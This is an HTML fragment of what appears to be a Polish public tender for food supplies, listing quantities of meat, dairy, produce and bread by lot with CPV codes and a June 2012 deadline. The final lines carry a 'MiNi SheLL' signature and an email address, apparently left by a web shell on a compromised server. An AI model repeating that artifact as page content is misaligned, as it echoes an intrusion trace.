5 Porcja rosołowa	50 kg
6 Kurczak świeży	25 kg
7 Żołądki drobiowe	20 kg
8 Wątróbka drobiowa 16 kg
9 Udka z kurczaka	15 kg
10 Ćwiartki z kurczaka 40 kg
11 Filet drobiowy z kurczaka	30 kg
12 Skrzydełka z kurczaka 13 kg
13 Łopatka b / k	60 kg
14 Schab b / k	25 kg
15 Karczek b / k	30 kg
16 Żeberka wieprzowe 15 kg
17 Kaszanka wieprzowa 12 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> artyluły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Mleko 2procent karton świeże 1 l 1 180,00 l
2 Jogurt owocowy typu Jogobella lub równoważny 150 g 150 szt
3 Serek śmietankowy różne smaki 125 g 60 szt
4 Serek wiejski 150 g 100 szt
5 Śmietana 12procent kubek 400 g 160 szt
6 Śmietana 18procent kubek 400 g 5 szt
7 Serek homogenizowany różne smaki 150 g 150 szt
8 Twaróg śmietankowy kostka 250g 100 szt
9 Jogurt do picia różne smaki 330g 80 szt
10 Maślanka 750 g.-smakowa  butelka 25 szt
11 Deser z koroną  różne smaki 175 g 100 szt
12 Ser żółty- salami 25 kg
13 Ser żółty- gouda 35 kg
14 Twaróg na sernik 1kg.-w wiaderku	20 kg
15 Ser topiony bloczek różne smaki 100 g 130 szt
16 Kefir , 400g.butelka 50 szt
17 Deser typu monte - 4 x 256g 15 op
18 Twaróg półtłusty krajanka 30 kg
19 Ser topiony w plastrach różne smaki 150g 60 szt
20 Mleko słodzone gotowane 510g 15 szt
21 Twaróg chudy folia 1kg. 15 kg
22 Deser ryżowy różne smaki 150 g 60 szt
23 Deser kaszka manna z polewą różne smaki 175 g 60 szt
23 Śmietanka kremówka 30% 1 l karton 5 l
24 Mleko skondensowane słodzone 533g 5 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce	
1 Banany	50 kg
2 Cytryna 28 kg
3 Jabłka	150 kg
4 Gruszki	30 kg
5 Kiwi	15 kg
6 Mandarynki 15 kg
7 Pomarańcza 30 kg
8 Truskawka ( mrożona) 15 kg
9  Winogron 3 kg
10 Arbuz	25 kg
11 Brzoskwinia 20 kg

Warzywa	
1 Burak czerwony	60 kg
2 Botwinka 10 pęczków
3 Cebula	80 kg
4 Brokuł (mrożony)	30 kg
5 Czosnek surowy	5 kg
6 Fasolka szparagowa(mrożona) 15 kg
7 Kalafior ( mrożony) 30 kg
8 Kapusta biała 80 kg
9 Kapusta czerwona 30 kg
10 Kapusta kwaszona 110 kg
11 Kapusta młoda	15 kg
12 Kapusta pekińska 30 kg
13 Koperek 100 pęczków
14 Marchew korzeń 170 kg
15 Mieszanka 8-składnikowa (mrożonka) 30 kg
16 Mieszanka marchew z groszkiem (mrożonka)	15 kg
17 Ogórek świeży	100 kg
18 Ogórek kwaszony 80 kg
19 Papryka świeża(różne kolory) 20 kg
20 Pieczarka 50 kg
21 Pietruszka korzeń 60 kg
22 Pietruszka natka 130 pęczków
23 Pomidor 100 kg
24 Por 40 kg
25 Rzodkiewka 80 pęczków
26 Frytki (mrożonka) 50 kg
27 Sałata zielona 90 szt
28 Seler korzeń 60 kg
29 Szczaw świeży	15 pęczków
30 Szczypiorek 130 szt
31 Włoszczyzna ( mrożonka)	10 kg
32 Ziemniaki 1 200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Chleb pszenno-żytni  krojony 600 g	950 szt
2 Bułka wrocławska, zwykła 100 g	450 szt
3 Chleb graham,krojony 500g 35 szt
4 Bułka słodka 100 g 200 szt
5 Pączek 100 g 140 szt
6 Chleb tostowy, krojony 400g 85 szt
7 Chleb wieloziarnisty, krojony 400 g	35 szt
8 Bułka grahamka 80 g 400 szt
9 Chleb magnus,krojony 350g 30 szt
10 Rogal maślany 100 g 40 szt
11 Chałka drożdżowa 300 g	20 szt
12 Bułka wrocławska hamburger 100 g	40 szt
13 Bułka wrocławska hot -dog 100 g	40 szt
14 Bułka maślana 70 g 40 szt
15 Chleb domowy,krojony 600g 20 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com